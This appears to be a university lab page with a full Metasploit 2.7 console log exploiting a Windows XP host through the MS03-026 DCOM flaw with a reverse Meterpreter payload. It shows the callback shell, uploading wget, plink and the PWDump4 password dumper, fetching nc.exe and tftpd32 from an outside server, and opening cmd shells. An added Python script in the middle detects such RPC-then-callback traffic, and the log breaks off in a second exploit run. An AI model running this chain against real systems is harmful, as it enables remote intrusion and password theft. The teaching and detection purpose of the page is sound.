Exploit XPUP using Msfconsole of framework 2 with meterpreter

Here we run msfconsole on viva and test an xpup machine. First log in to viva and edit your .bash_profile to include the path to framework-2.7. You can also use framework-3.0 if you are familiar with it; the two organize exploits and payloads differently, and framework-3.0 is the better organized of the two. Here is the PATH line in .bash_profile that I modified:

PATH=$PATH:$HOME/bin:/opt/framework-2.7

[cs591@viva ~]$ msfconsole
Using Term::ReadLine::Stub, I suggest installing something better (ie Term::ReadLine::Gnu)

 ____________
< metasploit >
 ------------
       \   ,__,
        \  (oo)____
           (__)    )\
              ||--|| *

+ -- --=[ msfconsole v2.7 [158 exploits - 76 payloads]

msf > show exploits

Metasploit Framework Loaded Exploits
====================================

  3com_3cdaemon_ftp_overflow      3Com 3CDaemon FTP Server Overflow
  Credits                         Metasploit Framework Credits
  afp_loginext                    AppleFileServer LoginExt PathName Overflow
  aim_goaway                      AOL Instant Messenger goaway Overflow
  altn_webadmin                   Alt-N WebAdmin USER Buffer Overflow
  apache_chunked_win32            Apache Win32 Chunked Encoding
  arkeia_agent_access             Arkeia Backup Client Remote Access
  arkeia_type77_macos             Arkeia Backup Client Type 77 Overflow (Mac OS X)
  arkeia_type77_win32             Arkeia Backup Client Type 77 Overflow (Win32)
  awstats_configdir_exec          AWStats configdir Remote Command Execution
  backupexec_agent                Veritas Backup Exec Windows Remote Agent Overflow
  backupexec_dump                 Veritas Backup Exec Windows Remote File Access
  backupexec_ns                   Veritas Backup Exec Name Service Overflow
  backupexec_registry             Veritas Backup Exec Server Registry Access
  badblue_ext_overflow            BadBlue 2.5 EXT.dll Buffer Overflow
  bakbone_netvault_heap           BakBone NetVault Remote Heap Overflow
  barracuda_img_exec              Barracuda IMG.PL Remote Command Execution
  blackice_pam_icq                ISS PAM.dll ICQ Parser Buffer Overflow
  bluecoat_winproxy               Blue Coat Systems WinProxy Host Header Buffer Overflow
  bomberclone_overflow_win32      Bomberclone 0.11.6 Buffer Overflow
  cabrightstor_disco              CA BrightStor Discovery Service Overflow
  cabrightstor_disco_servicepc    CA BrightStor Discovery Service SERVICEPC Overflow
  cabrightstor_sqlagent           CA BrightStor Agent for Microsoft SQL Overflow
  cabrightstor_uniagent           CA BrightStor Universal Agent Overflow
  cacam_logsecurity_win32         CA CAM log_security() Stack Overflow (Win32)
  cacti_graphimage_exec           Cacti graph_image.php Remote Command Execution
  calicclnt_getconfig             CA License Client GETCONFIG Overflow
  calicserv_getconfig             CA License Server GETCONFIG Overflow
  cesarftp_mkd                    Cesar FTP 0.99g MKD Command Buffer Overflow
  distcc_exec                     DistCC Daemon Command Execution
  edirectory_imonitor             eDirectory 8.7.3 iMonitor Remote Stack Overflow
  edirectory_imonitor2            eDirectory 8.8 iMonitor Remote Stack Overflow
  eiq_license                     EIQ License Manager Overflow
  eudora_imap                     Qualcomm WorldMail IMAPD Server Buffer Overflow
  exchange2000_xexch50            Exchange 2000 MS03-46 Heap Overflow
  firefox_queryinterface_linux    Firefox location.QueryInterface() Code Execution (Linux x86)
  firefox_queryinterface_osx      Firefox location.QueryInterface() Code Execution (Mac OS X)
  freeftpd_key_exchange           FreeFTPd 1.0.10 Key Exchange Algorithm Buffer Overflow
  freeftpd_user                   freeFTPd USER Overflow
  freesshd_key_exchange           FreeSSHd 1.0.9 Key Exchange Algorithm String Buffer Overflow
  futuresoft_tftpd                FutureSoft TFTP Server 2000 Buffer Overflow
  globalscapeftp_user_input       GlobalSCAPE Secure FTP Server user input overflow
  gnu_mailutils_imap4d            GNU Mailutils imap4d Format String Vulnerability
  google_proxystylesheet_exec     Google Appliance ProxyStyleSheet Command Execution
  hpux_ftpd_preauth_list          HP-UX FTP Server Preauthentication Directory Listing
  hpux_lpd_exec                   HP-UX LPD Command Execution
  ia_webmail                      IA WebMail 3.x Buffer Overflow
  icecast_header                  Icecast (<= 2.0.1) Header Overwrite (win32)
  ie_createobject                 Internet Explorer COM CreateObject Code Execution
  ie_createtextrange              Internet Explorer createTextRange() Code Execution
  ie_iscomponentinstalled         Windows XP SP0 IE 6.0 IsComponentInstalled() Overflow
  ie_objecttype                   Internet Explorer Object Type Overflow
  ie_vml_rectfill                 Internet Explorer VML Fill Method Code Execution
  ie_webview_setslice             Internet Explorer WebViewFolderIcon setSlice() Code Execution
  ie_xp_pfv_metafile              Windows XP/2003/Vista Metafile Escape() SetAbortProc Code Execution
  iis40_htr                       IIS 4.0 .HTR Buffer Overflow
  iis50_printer_overflow          IIS 5.0 Printer Buffer Overflow
  iis50_webdav_ntdll              IIS 5.0 WebDAV ntdll.dll Overflow
  iis_fp30reg_chunked             IIS FrontPage fp30reg.dll Chunked Overflow
  iis_nsiislog_post               IIS nsiislog.dll ISAPI POST Overflow
  iis_source_dumper               IIS Web Application Source Code Disclosure
  iis_w3who_overflow              IIS w3who.dll ISAPI Overflow
  imail_imap_delete               IMail IMAP4D Delete Overflow
  imail_ldap                      IMail LDAP Service Buffer Overflow
  irix_lpsched_exec               IRIX lpsched Command Execution
  kerio_auth                      Kerio Personal Firewall 2 (2.1.4) Remote Auth Packet Overflow
  lsass_ms04_011                  Microsoft LSASS MSO4-011 Overflow
  lyris_attachment_mssql          Lyris ListManager Attachment SQL Injection (MSSQL)
  mailenable_auth_header          MailEnable Authorization Header Buffer Overflow
  mailenable_imap                 MailEnable Pro (1.54) IMAP STATUS Request Buffer Overflow
  mailenable_imap_w3c             MailEnable IMAPD W3C Logging Buffer Overflow
  maxdb_webdbm_get_overflow       MaxDB WebDBM GET Buffer Overflow
  mcafee_epolicy_source           McAfee ePolicy Orchestrator / ProtPilot Source Overflow
  mdaemon_imap_cram_md5           Mdaemon 8.0.3 IMAPD CRAM-MD5 Authentication Overflow
  mercantec_softcart              Mercantec SoftCart CGI Overflow
  mercur_imap_select_overflow     Mercur v5.0 IMAP SP3 SELECT Buffer Overflow
  mercury_imap                    Mercury/32 v4.01a IMAP RENAME Buffer Overflow
  minishare_get_overflow          Minishare 1.4.1 Buffer Overflow
  mozilla_compareto               Mozilla Suite/Firefox InstallVersion->compareTo() Code Execution
  ms05_030_nntp                   Microsoft Outlook Express NNTP Response Overflow
  ms05_039_pnp                    Microsoft PnP MS05-039 Overflow
  msasn1_ms04_007_killbill        Microsoft ASN.1 Library Bitstring Heap Overflow
  msmq_deleteobject_ms05_017      Microsoft Message Queueing Service MSO5-017
  msrpc_dcom_ms03_026             Microsoft RPC DCOM MSO3-026
  mssql2000_preauthentication     MSSQL 2000/MSDE Hello Buffer Overflow
  mssql2000_resolution            MSSQL 2000/MSDE Resolution Overflow
  netapi_ms06_040                 Microsoft CanonicalizePathName() MSO6-040 Overflow
  netterm_netftpd_user_overflow   NetTerm NetFTPD USER Buffer Overflow
  niprint_lpd                     NIPrint LPD Request Overflow
  novell_messenger_acceptlang     Novell Messenger Server 2.0 Accept-Language Overflow
  openview_connectednodes_exec    HP Openview connectedNodes.ovpl Remote Command Execution
  openview_omniback               HP OpenView Omniback II Command Execution
  oracle9i_xdb_ftp                Oracle 9i XDB FTP UNLOCK Overflow (win32)
  oracle9i_xdb_ftp_pass           Oracle 9i XDB FTP PASS Overflow (win32)
  oracle9i_xdb_http               Oracle 9i XDB HTTP PASS Overflow (win32)
  pajax_remote_exec               PAJAX Remote Command Execution
  payload_handler                 Metasploit Framework Payload Handler
  peercast_url_linux              PeerCast <= 0.1216 URL Handling Buffer Overflow (Linux)
  peercast_url_win32              PeerCast <= 0.1216 URL Handling Buffer Overflow(win32)
  php_vbulletin_template          vBulletin misc.php Template Name Arbitrary Code Execution
  php_wordpress_lastpost          WordPress cache_lastpostdate Arbitrary Code Execution
  php_xmlrpc_eval                 PHP XML-RPC Arbitrary Code Execution
  phpbb_highlight                 phpBB viewtopic.php Arbitrary Code Execution
  phpnuke_search_module           PHPNuke Search Module SQL Injection Vulnerability
  poptop_negative_read            Poptop Negative Read Overflow
  privatewire_gateway_win32       Private Wire Gateway Buffer Overflow (win32)
  putty_ssh                       PuTTy.exe <= v0.53 Buffer Overflow
  realserver_describe_linux       RealServer Describe Buffer Overflow
  realvnc_41_bypass               RealVNC 4.1 Authentication Bypass
  realvnc_client                  RealVNC 3.3.7 Client Buffer Overflow
  rras_ms06_025                   Microsoft RRAS MSO6-025 Stack Overflow
  rras_ms06_025_rasman            Microsoft RRAS MSO6-025 RASMAN Registry Stack Overflow
  rsa_iiswebagent_redirect        IIS RSA WebAgent Redirect Overflow
  safari_safefiles_exec           Safari Archive Metadata Command Execution
  samba_nttrans                   Samba Fragment Reassembly Overflow
  samba_trans2open                Samba trans2open Overflow
  samba_trans2open_osx            Samba trans2open Overflow (Mac OS X)
  samba_trans2open_solsparc       Samba trans2open Overflow (Solaris SPARC)
  sambar6_search_results          Sambar 6 Search Results Buffer Overflow
  seattlelab_mail_55              Seattle Lab Mail 5.5 POP3 Buffer Overflow
  securecrt_ssh1                  SecureCRT <= 4.0 Beta 2 SSH1 Buffer Overflow
  sentinel_lm7_overflow           SentinelLM UDP Buffer Overflow
  servu_mdtm_overflow             Serv-U FTPD MDTM Overflow
  shixxnote_font                  ShixxNOTE 6.net Font Buffer Overflow
  shoutcast_format_win32          SHOUTcast DNAS/win32 1.9.4 File Request Format String Overflow
  slimftpd_list_concat            SlimFTPd LIST Concatenation Overflow
  smb_sniffer                     SMB Password Capture Service
  solaris_dtspcd_noir             Solaris dtspcd Heap Overflow
  solaris_kcms_readfile           Solaris KCMS Arbitary File Read
  solaris_lpd_exec                Solaris LPD Command Execution
  solaris_lpd_unlink              Solaris LPD Arbitrary File Delete
  solaris_sadmind_exec            Solaris sadmind Command Execution
  solaris_snmpxdmid               Solaris snmpXdmid AddComponent Overflow
  solaris_ttyprompt               Solaris in.telnetd TTYPROMPT Buffer Overflow
  sphpblog_file_upload            Simple PHP Blog remote command execution
  squid_ntlm_authenticate         Squid NTLM Authenticate Overflow
  svnserve_date                   Subversion Date Svnserve
  sybase_easerver                 Sybase EAServer 5.2 Remote Stack Overflow
  sygate_policy_manager           Sygate Management Server SQL Injection
  tftpd32_long_filename           TFTPD32 <= 2.21 Long Filename Buffer Overflow
  trackercam_phparg_overflow      TrackerCam PHP Argument Buffer Overflow
  ultravnc_client                 UltraVNC 1.0.1 Client Buffer Overflow
  uow_imap4_copy                  University of Washington IMAP4 COPY Overflow
  uow_imap4_lsub                  University of Washington IMAP4 LSUB Overflow
  ut2004_secure_linux             Unreal Tournament 2004 "secure" Overflow (Linux)
  ut2004_secure_win32             Unreal Tournament 2004 "secure" Overflow (Win32)
  warftpd_165_pass                War-FTPD 1.65 PASS Overflow
  warftpd_165_user                War-FTPD 1.65 USER Overflow
  webmin_file_disclosure          Webmin file disclosure
  webstar_ftp_user                WebSTAR FTP Server USER Overflow
  winamp_playlist_unc             Winamp Playlist UNC Path Computer Name Overflow
  windows_ssl_pct                 Microsoft SSL PCT MS04-011 Overflow
  wins_ms04_045                   Microsoft WINS MS04-045 Code Execution
  wmailserver_smtp                SoftiaCom WMailserver 1.0 SMTP Buffer Overflow
  wsftp_server_503_mkd            WS-FTP Server 5.03 MKD Overflow
  wzdftpd_site                    Wzdftpd SITE Command Arbitrary Command Execution
  ypops_smtp                      YahooPOPS! <= 0.6 SMTP Buffer Overflow
  zenworks_desktop_agent          ZENworks 6.5 Desktop/Server Management Remote Stack Overflow

msf > set msrpc_dcom_ms03_026
msfconsole: set: command not found
msf > use msrpc_dcom_ms03_026
msf msrpc_dcom_ms03_026 > set RHOST 128.198.60.156
RHOST -> 128.198.60.156
msf msrpc_dcom_ms03_026 > set RPORT 135
RPORT -> 135
msf msrpc_dcom_ms03_026 > set LHOST 128.198.60.192
LHOST -> 128.198.60.192
msf msrpc_dcom_ms03_026 > set LPORT 4321
LPORT -> 4321
msf msrpc_dcom_ms03_026 > show payloads

Metasploit Framework Usable Payloads
====================================

  win32_adduser                   Windows Execute net user /ADD
  win32_bind                      Windows Bind Shell
  win32_bind_dllinject            Windows Bind DLL Inject
  win32_bind_meterpreter          Windows Bind Meterpreter DLL Inject
  win32_bind_stg                  Windows Staged Bind Shell
  win32_bind_stg_upexec           Windows Staged Bind Upload/Execute
  win32_bind_vncinject            Windows Bind VNC Server DLL Inject
  win32_downloadexec              Windows Executable Download and Execute
  win32_exec                      Windows Execute Command
  win32_passivex                  Windows PassiveX ActiveX Injection Payload
  win32_passivex_meterpreter      Windows PassiveX ActiveX Inject Meterpreter Payload
  win32_passivex_stg              Windows Staged PassiveX Shell
  win32_passivex_vncinject        Windows PassiveX ActiveX Inject VNC Server Payload
  win32_reverse                   Windows Reverse Shell
  win32_reverse_dllinject         Windows Reverse DLL Inject
  win32_reverse_meterpreter       Windows Reverse Meterpreter DLL Inject
  win32_reverse_ord               Windows Staged Reverse Ordinal Shell
  win32_reverse_ord_vncinject     Windows Reverse Ordinal VNC Server Inject
  win32_reverse_stg               Windows Staged Reverse Shell
  win32_reverse_stg_upexec        Windows Staged Reverse Upload/Execute
  win32_reverse_vncinject         Windows Reverse VNC Server Inject

msf msrpc_dcom_ms03_026 > set win32_reverse_meterpreter
win32_reverse_meterpreter:
msf msrpc_dcom_ms03_026 > set TARGET 2
TARGET -> 2
msf msrpc_dcom_ms03_026 > exploit
[*] This exploit requires a valid payload to be specified first.
msf msrpc_dcom_ms03_026 > set payload win32_reverse_meterpreter
payload -> win32_reverse_meterpreter
[*] WARNING: the correct case of the 'payload' variable is 'PAYLOAD'
msf msrpc_dcom_ms03_026(win32_reverse_meterpreter) > exploit
[*] Invalid target specified.
msf msrpc_dcom_ms03_026(win32_reverse_meterpreter) > set PAYLOAD win32_reverse_meterpreter
PAYLOAD -> win32_reverse_meterpreter
msf msrpc_dcom_ms03_026(win32_reverse_meterpreter) > exploit
[*] Invalid target specified.
msf msrpc_dcom_ms03_026(win32_reverse_meterpreter) > set TARGET 0
TARGET -> 0
msf msrpc_dcom_ms03_026(win32_reverse_meterpreter) > exploit
[*] Starting Reverse Handler.
[*] Sending request...
[*] Got connection from 128.198.60.192:4321 <-> 128.198.60.156:1027
[*] Sending Intermediate Stager (89 bytes)
[*] Sending Stage (2834 bytes)
[*] Sleeping before sending dll.
[*] Uploading dll to memory (69643), Please wait...
[*] Upload completed

meterpreter>
[ -= connected to =- ]
[ -= meterpreter server =- ]
[ -= v. 00000500 =- ]

meterpreter> ls
invalid command
meterpreter> help

Core         Core feature set commands
------------ ----------------
read         Reads from a communication channel
write        Writes to a communication channel
close        Closes a communication channel
interact     Switch to interactive mode with a channel
help         Displays the list of all register commands
exit         Exits the client
initcrypt    Initializes the cryptographic subsystem

Extensions   Feature extension commands
------------ ----------------
loadlib      Loads a library on the remote endpoint
use          Uses a feature extension module

meterpreter> use -m Process
loadlib: Loading library from 'ext472627.dll' on the remote machine.
meterpreter> loadlib: success.
meterpreter> help

Core         Core feature set commands
------------ ----------------
read         Reads from a communication channel
write        Writes to a communication channel
close        Closes a communication channel
interact     Switch to interactive mode with a channel
help         Displays the list of all register commands
exit         Exits the client
initcrypt    Initializes the cryptographic subsystem

Extensions   Feature extension commands
------------ ----------------
loadlib      Loads a library on the remote endpoint
use          Uses a feature extension module

Process      Process manipulation and execution commands
------------ ----------------
execute      Executes a process on the remote endpoint
kill         Terminate one or more processes on the remote endpoint
ps           List processes on the remote endpoint

meterpreter> use -m Fs
loadlib: Loading library from 'ext500104.dll' on the remote machine.
meterpreter> loadlib: success.
meterpreter> help

Core         Core feature set commands
------------ ----------------
read         Reads from a communication channel
write        Writes to a communication channel
close        Closes a communication channel
interact     Switch to interactive mode with a channel
help         Displays the list of all register commands
exit         Exits the client
initcrypt    Initializes the cryptographic subsystem

Extensions   Feature extension commands
------------ ----------------
loadlib      Loads a library on the remote endpoint
use          Uses a feature extension module

Process      Process manipulation and execution commands
------------ ----------------
execute      Executes a process on the remote endpoint
kill         Terminate one or more processes on the remote endpoint
ps           List processes on the remote endpoint

File System  File system interaction and manipulation commands
------------ ----------------
cd           Change working directory.
getcwd       Get the current working directory.
ls           List the contents of a directory.
upload       Upload one or more files to a remote directory.
download     Download one or more files from a remote directory.

meterpreter> upload wget.exe
Usage: upload src1 [src2 ...] dst
meterpreter> upload wget.exe c:\
upload: Starting upload of 'wget.exe' to 'c:\\wget.exe'...
upload: 1 uploads started.
meterpreter> upload: Upload from 'wget.exe' succeeded.
meterpreter> upload plink.exe
Usage: upload src1 [src2 ...] dst
meterpreter> upload plink.exe c:\
upload: Starting upload of 'plink.exe' to 'c:\\plink.exe'...
upload: 1 uploads started.
meterpreter> upload: Upload from 'plink.exe' succeeded.
meterpreter> execute -f wget.exe -a http://viva.uccs.edu/~cs591/wintool/tftpd32.exe
execute: Executing 'wget.exe'...
meterpreter> execute: failure, 2.
meterpreter> help

Core         Core feature set commands
------------ ----------------
read         Reads from a communication channel
write        Writes to a communication channel
close        Closes a communication channel
interact     Switch to interactive mode with a channel
help         Displays the list of all register commands
exit         Exits the client
initcrypt    Initializes the cryptographic subsystem

Extensions   Feature extension commands
------------ ----------------
loadlib      Loads a library on the remote endpoint
use          Uses a feature extension module

Process      Process manipulation and execution commands
------------ ----------------
execute      Executes a process on the remote endpoint
kill         Terminate one or more processes on the remote endpoint
ps           List processes on the remote endpoint

File System  File system interaction and manipulation commands
------------ ----------------
cd           Change working directory.
getcwd       Get the current working directory.
ls           List the contents of a directory.
upload       Upload one or more files to a remote directory.
download     Download one or more files from a remote directory.

meterpreter> execute -f c:\wget.exe -a http://viva.uccs.edu/~cs591/wintool/nc.exe
execute: Executing 'c:\wget.exe'...
meterpreter> execute: success, process id is 188.
meterpreter> execute -f c:\wget.exe -a http://viva.uccs.edu/~cs591/wintool/tftpd32.exe
execute: Executing 'c:\wget.exe'...
meterpreter> execute: success, process id is 224.
meterpreter> execute -f c:\tftpd32.exe
execute: Executing 'c:\tftpd32.exe'...
meterpreter> execute: failure, 2.
meterpreter> execute -f cmd -c
execute: Executing 'cmd'...
meterpreter> execute: success, process id is 2020.
execute: allocated channel 3 for new process.
meterpreter> interact 3
interact: Switching to interactive console on 3...
meterpreter> interact: Started interactive channel 3.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>cd ..
cd ..

C:\WINDOWS>cd ..
cd ..
C:\>ls
ls
'ls' is not recognized as an internal or external command,
operable program or batch file.

C:\>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is ECC2-88FC

 Directory of C:\

07/27/2004  09:21 PM                 0 AUTOEXEC.BAT
07/27/2004  09:21 PM                 0 CONFIG.SYS
07/27/2004  09:54 PM    <DIR>          cs301
01/07/2007  12:23 AM    <DIR>          Documents and Settings
03/05/2007  10:59 PM           229,376 plink.exe
01/07/2007  12:20 AM    <DIR>          Program Files
03/05/2007  10:58 PM           308,736 wget.exe
01/06/2007  11:27 PM    <DIR>          WINDOWS
               4 File(s)        538,112 bytes
               4 Dir(s)  15,457,402,880 bytes free

C:\>plink.exe -ssh cs591@viva.uccs.edu
plink.exe -ssh cs591@viva.uccs.edu
The server's host key is not cached in the registry. You
have no guarantee that the server is the computer you
think it is.
The server's key fingerprint is:
ssh-rsa 2048 a8:e4:d7:d4:e7:61:dd:02:26:e6:c1:b5:f9:12:2b:83
If you trust this host, enter "y" to add the key to
PuTTY's cache and carry on connecting.
If you want to carry on connecting just once, without
adding the key to the cache, enter "n".
If you do not trust this host, press Return to abandon the
connection.
Store key in cache? (y/n) y
cs591@viva.uccs.edu's password: XXXXXX
cs591@viva.uccs.edu's password: XXXXXX
cs591@viva.uccs.edu's password:
Caught interrupt, close interactive session? [y/N] y

meterpreter> execute -f cmd -c
execute: Executing 'cmd'...
meterpreter> execute: success, process id is 356.
execute: allocated channel 4 for new process.
meterpreter> interact 4
interact: Switching to interactive console on 4...
meterpreter> interact: Started interactive channel 4.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>cd ..
cd ..

C:\WINDOWS>cd ..
cd ..

C:\>ls
ls
'ls' is not recognized as an internal or external command,
operable program or batch file.

C:\>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is ECC2-88FC

 Directory of C:\

07/27/2004  09:21 PM                 0 AUTOEXEC.BAT
07/27/2004  09:21 PM                 0 CONFIG.SYS
07/27/2004  09:54 PM    <DIR>          cs301
01/07/2007  12:23 AM    <DIR>          Documents and Settings
03/05/2007  10:59 PM           229,376 plink.exe
01/07/2007  12:20 AM    <DIR>          Program Files
03/05/2007  10:58 PM           308,736 wget.exe
03/05/2007  11:09 PM    <DIR>          WINDOWS
               4 File(s)        538,112 bytes
               4 Dir(s)  15,457,370,112 bytes free

C:\>plink -l cs591 -pw XXXXXX viva.uccs.edu
plink -l cs591 -pw XXXXX viva.uccs.edu
Last login: Wed May  9 00:15:10 2007 from c-75-70-32-124.hsd1.co.comcast.net
[cs591@viva ~]$ ls
ls
bin                      CS591S2007Grade.txt            out          vmware
bufferOverflow           Desktop                        public_html
cs591ClientFromViva.p12  framework-2.7-snapshot.tar.gz  secure
[cs591@viva ~]$ exit
exit
logout
Using username "cs591".

C:\>plink -ssh cs591@viva.ucs.edu scp
plink -ssh cs591@viva.ucs.edu scp
Unable to open connection:
Host does not exist

C:\>
meterpreter> upload ../passwd-attack/PWDump4.exe c:\
upload: Starting upload of '../passwd-attack/PWDump4.exe' to 'c:\\PWDump4.exe'...
upload: 1 uploads started.
meterpreter> upload: Upload from '../passwd-attack/PWDump4.exe' succeeded.
meterpreter> upload ../passwd-attack/PWDupm4.dll c:\
upload: Starting upload of '../passwd-attack/PWDupm4.dll' to 'c:\\PWDupm4.dll'...
upload: 1 uploads started.
meterpreter> Error: Local file '../passwd-attack/PWDupm4.dll' could not be opened for reading.
meterpreter> upload ../passwd-attack/PWDump4.dll c:\
upload: Starting upload of '../passwd-attack/PWDump4.dll' to 'c:\\PWDump4.dll'...
upload: 1 uploads started.
meterpreter> upload: Upload from '../passwd-attack/PWDump4.dll' succeeded.
meterpreter> help

Core         Core feature set commands
------------ ----------------
read         Reads from a communication channel
write        Writes to a communication channel
close        Closes a communication channel
interact     Switch to interactive mode with a channel
help         Displays the list of all register commands
exit         Exits the client
initcrypt    Initializes the cryptographic subsystem

Extensions   Feature extension commands
------------ ----------------
loadlib      Loads a library on the remote endpoint
use          Uses a feature extension module

Process      Process manipulation and execution commands
------------ ----------------
execute      Executes a process on the remote endpoint
kill         Terminate one or more processes on the remote endpoint
ps           List processes on the remote endpoint

File System  File system interaction and manipulation commands
------------ ----------------
cd           Change working directory.
getcwd       Get the current working directory.
ls           List the contents of a directory.
upload       Upload one or more files to a remote directory.
download     Download one or more files from a remote directory.

meterpreter> upload ../passwd-attack/PWDump4.exe c:\
upload: Starting upload of '../passwd-attack/PWDump4.exe' to 'c:\\PWDump4.exe'...
upload: 1 uploads started.
meterpreter> upload: Upload from '../passwd-attack/PWDump4.exe' succeeded.
meterpreter> upload ../passwd-attack/PWDupm4.dll c:\
upload: Starting upload of '../passwd-attack/PWDupm4.dll' to 'c:\\PWDupm4.dll'...
upload: 1 uploads started.
meterpreter> Error: Local file '../passwd-attack/PWDupm4.dll' could not be opened for reading.
meterpreter> upload ../passwd-attack/PWDump4.dll c:\
upload: Starting upload of '../passwd-attack/PWDump4.dll' to 'c:\\PWDump4.dll'...
upload: 1 uploads started.
meterpreter> upload: Upload from '../passwd-attack/PWDump4.dll' succeeded.
meterpreter> execute -f cmd -c
execute: Executing 'cmd'...
meterpreter>
meterpreter> execute -f cmd -c
execute: Executing 'cmd'...
meterpreter>
meterpreter>
meterpreter> show
invalid command
meterpreter> help

Core         Core feature set commands
------------ ----------------
read         Reads from a communication channel
write        Writes to a communication channel
close        Closes a communication channel
interact     Switch to interactive mode with a channel
help         Displays the list of all register commands
exit         Exits the client
initcrypt    Initializes the cryptographic subsystem

Extensions   Feature extension commands
------------ ----------------
loadlib      Loads a library on the remote endpoint
use          Uses a feature extension module

Process      Process manipulation and execution commands
------------ ----------------
execute      Executes a process on the remote endpoint
kill         Terminate one or more processes on the remote endpoint
ps           List processes on the remote endpoint

File System  File system interaction and manipulation commands
------------ ----------------
cd           Change working directory.
getcwd       Get the current working directory.
ls           List the contents of a directory.
upload       Upload one or more files to a remote directory.
download     Download one or more files from a remote directory.

meterpreter> execute -f cmd -c
execute: Executing 'cmd'...
meterpreter>
meterpreter> exit
exit
The meterpreter is shutting down...
[*] Meterpreter client finished.
[*] Exiting Reverse Handler.
msf msrpc_dcom_ms03_026(win32_reverse_meterpreter) > exploit
[*] Starting Reverse Handler.
[*] Sending request...
[*] Exiting Reverse Handler.
msf msrpc_dcom_ms03_026(win32_reverse_meterpreter) > exploit
[*] Starting Reverse Handler.
[*] Sending request...
[*] Exiting Reverse Handler.
msf msrpc_dcom_ms03_026(win32_reverse_meterpreter) > exploit
[*] Starting Reverse Handler.
[*] Sending request...
[*] Exiting Reverse Handler.
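The first session above has a shape that is visible from the network alone: the target receives an inbound connection on TCP 135 (the DCE-RPC endpoint mapper the exploit talks to), and within a second or two the same target opens a connection back to the same peer on a high, otherwise unused port (the reverse handler on LPORT 4321). The following is an added example written for this page, not part of the original lab or of the Metasploit framework. It runs that correlation over a handful of constructed flow records (the RFC 5737 addresses, timestamps and port numbers are made up for the example; the 60-second window and the list of expected outbound ports are assumptions a site would tune) and reports target hosts whose callback follows an RPC hit too closely to be coincidence.

```python
"""Flag hosts that accept an inbound DCE-RPC endpoint-mapper connection (TCP 135)
and shortly afterwards connect back to the same peer on an unusual port.
Added example for the lab writeup above; flow records are constructed."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed flow records (not from the original page): "timestamp src:sport dst:dport".
# Row 2 mirrors the session above (callback on 4321 one second after the RPC hit);
# row 4 is a normal SMB follow-up, row 6 is far outside the window, row 7 has no prior RPC hit.
SAMPLE_FLOWS = """\
2007-03-05T23:05:01 192.0.2.10:33012 192.0.2.20:135
2007-03-05T23:05:02 192.0.2.20:1027 192.0.2.10:4321
2007-03-05T23:10:00 192.0.2.30:41000 192.0.2.20:135
2007-03-05T23:10:01 192.0.2.20:1028 192.0.2.30:445
2007-03-05T23:20:00 192.0.2.40:50000 192.0.2.20:135
2007-03-05T23:40:00 192.0.2.20:1029 192.0.2.40:4444
2007-03-05T23:41:00 192.0.2.20:1030 192.0.2.99:4321
"""

# Destination ports a workstation may legitimately open soon after RPC traffic (assumed site baseline).
EXPECTED_OUTBOUND = {53, 80, 88, 135, 139, 389, 443, 445}
WINDOW = timedelta(seconds=60)  # assumed: how soon after the RPC hit a callback is suspicious


def parse_flows(text):
    """Parse the constructed record format into sorted (ts, src_ip, src_port, dst_ip, dst_port) tuples."""
    flows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, dst = line.split()
        sip, sport = src.rsplit(":", 1)
        dip, dport = dst.rsplit(":", 1)
        flows.append((datetime.fromisoformat(ts), sip, int(sport), dip, int(dport)))
    return sorted(flows)


def find_callbacks(flows, window=WINDOW):
    """Return one finding per (target, peer) where the target connected back to a peer that had
    just hit its port 135, on a port outside EXPECTED_OUTBOUND, within `window`."""
    # Index inbound port-135 connections by (target, peer) so the reverse direction can be looked up.
    rpc_hits = defaultdict(list)
    for ts, sip, sport, dip, dport in flows:
        if dport == 135:
            rpc_hits[(dip, sip)].append(ts)

    findings = []
    for ts, sip, sport, dip, dport in flows:
        if dport in EXPECTED_OUTBOUND:
            continue
        # Here sip is the (possible) target and dip the peer that earlier reached its port 135.
        for rpc_ts in rpc_hits.get((sip, dip), []):
            delta = ts - rpc_ts
            if timedelta(0) <= delta <= window:
                findings.append({
                    "target": sip,
                    "peer": dip,
                    "callback_port": dport,
                    "seconds_after_rpc": int(delta.total_seconds()),
                })
                break
    return findings


if __name__ == "__main__":
    for f in find_callbacks(parse_flows(SAMPLE_FLOWS)):
        print(f"{f['target']} called back to {f['peer']}:{f['callback_port']} "
              f"{f['seconds_after_rpc']}s after an inbound RPC connection")
```

The check is deliberately direction-aware: an inbound 135 followed by the target initiating a new session to the same peer is what distinguishes a reverse handler from ordinary RPC traffic, which stays on the connection the client opened. A bind payload (`win32_bind_meterpreter` in the list above) would instead show the peer connecting in a second time on the bind port, so a production rule would pair this with the inbound variant.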
msf msrpc_dcom_ms03_026(win32_reverse_meterpreter) > quit
[cs591@viva tools]$ msfconsole
Using Term::ReadLine::Stub, I suggest installing something better (ie Term::ReadLine::Gnu)

                _                  _       _ _
               | |                | |     (_) |
 _ __ ___   ___| |_ __ _ ___ _ __ | | ___  _| |_
| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __|
| | | | | |  __/ || (_| \__ \ |_) | | (_) | | |_
|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__|
                            | |
                            |_|

+ -- --=[ msfconsole v2.7 [158 exploits - 76 payloads]

msf > set msrpc_dcom_ms03_026
msfconsole: set: command not found
msf > use msrpc_dcom_ms03_026
msf msrpc_dcom_ms03_026 > set RHOST 128.198.60.156
RHOST -> 128.198.60.156
msf msrpc_dcom_ms03_026 > set RPORT 135
RPORT -> 135
msf msrpc_dcom_ms03_026 > set LHOST 128.198.60.192
LHOST -> 128.198.60.192
msf msrpc_dcom_ms03_026 > set LPORT 4321
LPORT -> 4321
msf msrpc_dcom_ms03_026 > set win32_reverse_meterpreter
win32_reverse_meterpreter:
msf msrpc_dcom_ms03_026 > set PAYLOAD win32_reverse_meterpreter
PAYLOAD -> win32_reverse_meterpreter
msf msrpc_dcom_ms03_026(win32_reverse_meterpreter) > set TARGET 0
TARGET -> 0
msf msrpc_dcom_ms03_026(win32_reverse_meterpreter) > exploit
[*] Starting Reverse Handler.
[*] Sending request...
[*] Got connection from 128.198.60.192:4321 <-> 128.198.60.156:1027
